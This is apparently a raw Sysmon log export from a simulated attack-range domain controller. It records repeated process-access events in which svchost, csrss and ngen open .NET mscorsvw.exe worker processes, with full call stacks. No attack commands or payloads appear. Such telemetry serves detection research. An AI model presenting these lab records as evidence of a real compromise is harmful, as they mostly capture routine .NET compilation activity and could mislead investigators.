SYSTEM32\ntdll.dll+51791 11241100x80000000000000006246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:46:31.703{59A5CD1D-9137-6005-1602-00000000A301}3692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e6c-0\Microsoft.Workflow.Compiler.exe2021-01-18 13:46:31.703 10341000x80000000000000006245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1602-00000000A301}3692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.593{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1602-00000000A301}3692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.593{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1602-00000000A301}3692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.468{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1502-00000000A301}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.452{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1502-00000000A301}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.452{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1502-00000000A301}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1402-00000000A301}5056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.406{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1402-00000000A301}5056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.406{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1402-00000000A301}5056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.359{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1302-00000000A301}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.359{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1302-00000000A301}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.359{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1302-00000000A301}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.312{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1202-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.296{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1202-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.296{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1202-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.265{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1102-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.249{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1102-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.249{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1102-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.218{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.202{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.202{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-0F02-00000000A301}1584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.093{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-0F02-00000000A301}1584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.093{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-0F02-00000000A301}1584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3